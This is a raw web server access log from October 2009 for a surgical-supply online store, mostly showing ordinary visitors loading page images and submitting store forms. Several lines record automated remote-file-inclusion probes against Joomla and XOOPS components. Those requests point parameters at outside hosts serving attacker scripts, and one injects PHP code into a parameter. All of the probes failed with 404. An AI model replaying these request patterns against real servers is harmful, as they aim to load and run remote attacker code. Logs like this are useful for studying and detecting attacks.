221.170.181.17 - - [22/Oct/2009:00:27:44 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 200 1354 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; YTB720; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
221.170.181.17 - - [22/Oct/2009:00:27:45 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 200 1195 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; YTB720; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
221.170.181.17 - - [22/Oct/2009:00:27:45 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 200 1089 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; YTB720; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
221.170.181.17 - - [22/Oct/2009:00:27:45 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 200 1156 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; YTB720; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
221.170.181.17 - - [22/Oct/2009:00:27:45 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 200 1097 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; YTB720; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
221.170.181.17 - - [22/Oct/2009:00:27:45 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 200 1110 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; YTB720; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.34.121.240 - - [22/Oct/2009:00:27:48 -0400] "GET /images/pf-b.gif HTTP/1.1" 200 813 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11379E4B8049A100A389076+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
221.170.181.17 - - [22/Oct/2009:00:27:55 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/tutorials.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; YTB720; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
221.170.181.17 - - [22/Oct/2009:00:27:55 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/tutorials.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; YTB720; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
85.17.19.172 - - [22/Oct/2009:00:28:01 -0400] "GET /logs//components/com_extcalendar/setup.php?mosConfig_absolute_path=http://ssdnb.net//bbs//zfxid1.txt? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
85.17.19.172 - - [22/Oct/2009:00:28:01 -0400] "GET /logs/access_log.Q109063000%20%20//components/com_extcalendar/setup.php?mosConfig_absolute_path=http://ssdnb.net//bbs//zfxid1.txt? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
85.17.19.172 - - [22/Oct/2009:00:28:01 -0400] "GET //components/com_extcalendar/setup.php?mosConfig_absolute_path=http://ssdnb.net//bbs//zfxid1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
68.34.121.240 - - [22/Oct/2009:00:28:04 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11379E4B8049A100A389076+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.34.121.240 - - [22/Oct/2009:00:28:04 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.34.121.240 - - [22/Oct/2009:00:28:04 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.34.121.240 - - [22/Oct/2009:00:28:04 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
85.17.19.172 - - [22/Oct/2009:00:28:31 -0400] "GET //components/com_extcalendar/setup.php?mosConfig_absolute_path=http://ssdnb.net//bbs//zfxid1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
85.17.19.172 - - [22/Oct/2009:00:28:31 -0400] "GET /logs//components/com_extcalendar/setup.php?mosConfig_absolute_path=http://ssdnb.net//bbs//zfxid1.txt? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
85.17.19.172 - - [22/Oct/2009:00:28:32 -0400] "GET /logs/access_log.Q109063000%20%20//components/com_extcalendar/setup.php?mosConfig_absolute_path=http://ssdnb.net//bbs//zfxid1.txt? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
85.17.19.172 - - [22/Oct/2009:00:28:33 -0400] "GET /logs//components/com_extcalendar/setup.php?mosConfig_absolute_path=http://ssdnb.net//bbs//zfxid1.txt? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
85.17.19.172 - - [22/Oct/2009:00:28:33 -0400] "GET /logs/access_log.Q109063000%20%20//components/com_extcalendar/setup.php?mosConfig_absolute_path=http://ssdnb.net//bbs//zfxid1.txt? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
85.17.19.172 - - [22/Oct/2009:00:28:33 -0400] "GET //components/com_extcalendar/setup.php?mosConfig_absolute_path=http://ssdnb.net//bbs//zfxid1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
85.17.19.172 - - [22/Oct/2009:00:28:43 -0400] "GET /logs/access_log.Q109071900%20%20//components/com_extcalendar/setup.php?mosConfig_absolute_path=http://ssdnb.net//bbs//zfxid1.txt? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
85.17.19.172 - - [22/Oct/2009:00:29:03 -0400] "GET /logs/access_log.Q109071900%20%20//components/com_extcalendar/setup.php?mosConfig_absolute_path=http://ssdnb.net//bbs//zfxid1.txt? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
85.17.19.172 - - [22/Oct/2009:00:29:04 -0400] "GET /logs/access_log.Q109071900%20%20//components/com_extcalendar/setup.php?mosConfig_absolute_path=http://ssdnb.net//bbs//zfxid1.txt? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
63.223.85.28 - - [22/Oct/2009:00:29:14 -0400] "GET /logs/error_log.Q109091700%20%20//components/com_virtuemart/errors.php?error=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
63.223.85.28 - - [22/Oct/2009:00:29:14 -0400] "GET /logs/error_log.Q109091700%20%20//components/com_virtuemart/errors.php?error=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
68.34.121.240 - - [22/Oct/2009:00:29:55 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11379E4B8049A100A389076+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.34.121.240 - - [22/Oct/2009:00:29:57 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11379E4B8049A100A389076+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.34.121.240 - - [22/Oct/2009:00:29:58 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11379E4B8049A100A389076+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.34.121.240 - - [22/Oct/2009:00:29:58 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11379E4B8049A100A389076+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.34.121.240 - - [22/Oct/2009:00:30:04 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L11379E4380B96100B409076+M37+ENG HTTP/1.1" 200 77723 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11379E4B8049A100A389076+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.34.121.240 - - [22/Oct/2009:00:30:05 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11379E4380B96100B409076+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.34.121.240 - - [22/Oct/2009:00:30:05 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11379E4380B96100B409076+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.34.121.240 - - [22/Oct/2009:00:30:05 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11379E4380B96100B409076+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.34.121.240 - - [22/Oct/2009:00:30:05 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11379E4380B96100B409076+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.34.121.240 - - [22/Oct/2009:00:30:05 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11379E4380B96100B409076+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.34.121.240 - - [22/Oct/2009:00:30:05 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11379E4380B96100B409076+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.34.121.240 - - [22/Oct/2009:00:30:05 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11379E4380B96100B409076+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.34.121.240 - - [22/Oct/2009:00:30:05 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11379E4380B96100B409076+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.34.121.240 - - [22/Oct/2009:00:30:05 -0400] "GET /images/blend.jpg HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11379E4380B96100B409076+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.34.121.240 - - [22/Oct/2009:00:30:05 -0400] "GET /images/cat_dot.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11379E4380B96100B409076+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.34.121.240 - - [22/Oct/2009:00:30:06 -0400] "GET /images/cat_link.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11379E4380B96100B409076+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.34.121.240 - - [22/Oct/2009:00:30:06 -0400] "GET /images/cat_expand.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11379E4380B96100B409076+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.34.121.240 - - [22/Oct/2009:00:30:06 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11379E4380B96100B409076+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.34.121.240 - - [22/Oct/2009:00:30:06 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11379E4380B96100B409076+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.34.121.240 - - [22/Oct/2009:00:30:06 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11379E4380B96100B409076+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.34.121.240 - - [22/Oct/2009:00:30:06 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11379E4380B96100B409076+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.34.121.240 - - [22/Oct/2009:00:30:06 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11379E4380B96100B409076+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.34.121.240 - - [22/Oct/2009:00:30:06 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11379E4380B96100B409076+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.34.121.240 - - [22/Oct/2009:00:30:06 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11379E4380B96100B409076+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.34.121.240 - - [22/Oct/2009:00:30:06 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11379E4380B96100B409076+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.34.121.240 - - [22/Oct/2009:00:30:06 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11379E4380B96100B409076+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.34.121.240 - - [22/Oct/2009:00:30:06 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11379E4380B96100B409076+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.34.121.240 - - [22/Oct/2009:00:30:15 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L11379F438C4961007369076+M37+ENG HTTP/1.1" 200 38965 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11379E4380B96100B409076+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
209.59.12.99 - - [22/Oct/2009:00:30:16 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
68.34.121.240 - - [22/Oct/2009:00:30:35 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L11379F4E8829B1007819076+M37+ENG HTTP/1.1" 200 38961 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11379F438C4961007369076+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.34.121.240 - - [22/Oct/2009:00:31:05 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L11379F4F88A9910081E9076+M37+ENG HTTP/1.1" 200 38943 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11379F4E8829B1007819076+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.34.121.240 - - [22/Oct/2009:00:31:13 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L11379F4D8239F100AC29076+M37+ENG HTTP/1.1" 200 77724 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11379F4F88A9910081E9076+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.34.121.240 - - [22/Oct/2009:00:31:17 -0400] "GET /images/cat_collapse.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11379F4D8239F100AC29076+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
208.89.214.167 - - [22/Oct/2009:00:31:21 -0400] "GET /logs/access_log.Q109090700/?_zb_path=http://homesprings.co.kr/plugins/logs/gue/fx29id.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
216.71.23.37 - - [22/Oct/2009:00:31:40 -0400] "GET //modules/protector/onupdate.php?mydirname=a()%7B%7Dinclude($_GET%5Ba%5D);function%20v&a=http://www.montepo.com/img/iniziative/baner.txt?? HTTP/1.0" 404 229 "-" "Mozilla/5.0"
216.71.23.37 - - [22/Oct/2009:00:31:40 -0400] "GET /logs//modules/protector/onupdate.php?mydirname=a()%7B%7Dinclude($_GET%5Ba%5D);function%20v&a=http://www.montepo.com/img/iniziative/baner.txt?? HTTP/1.0" 404 234 "-" "Mozilla/5.0"
216.71.23.37 - - [22/Oct/2009:00:31:40 -0400] "GET /logs/access_log.Q109052000//modules/protector/onupdate.php?mydirname=a()%7B%7Dinclude($_GET%5Ba%5D);function%20v&a=http://www.montepo.com/img/iniziative/baner.txt?? HTTP/1.0" 404 256 "-" "Mozilla/5.0"
68.34.121.240 - - [22/Oct/2009:00:31:41 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L11379F448029E100B3A9076+M37+ENG HTTP/1.1" 200 43478 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11379F4D8239F100AC29076+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.34.121.240 - - [22/Oct/2009:00:31:47 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L11379F4E85799100C8D9076+M37+ENG HTTP/1.1" 200 58685 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11379F448029E100B3A9076+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.34.121.240 - - [22/Oct/2009:00:31:49 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11379F4E85799100C8D9076+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.34.121.240 - - [22/Oct/2009:00:31:49 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11379F4E85799100C8D9076+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.34.121.240 - - [22/Oct/2009:00:31:49 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11379F4E85799100C8D9076+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.34.121.240 - - [22/Oct/2009:00:31:49 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11379F4E85799100C8D9076+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.34.121.240 - - [22/Oct/2009:00:31:49 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11379F4E85799100C8D9076+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.34.121.240 - - [22/Oct/2009:00:31:49 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11379F4E85799100C8D9076+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.34.121.240 - - [22/Oct/2009:00:31:49 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11379F4E85799100C8D9076+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
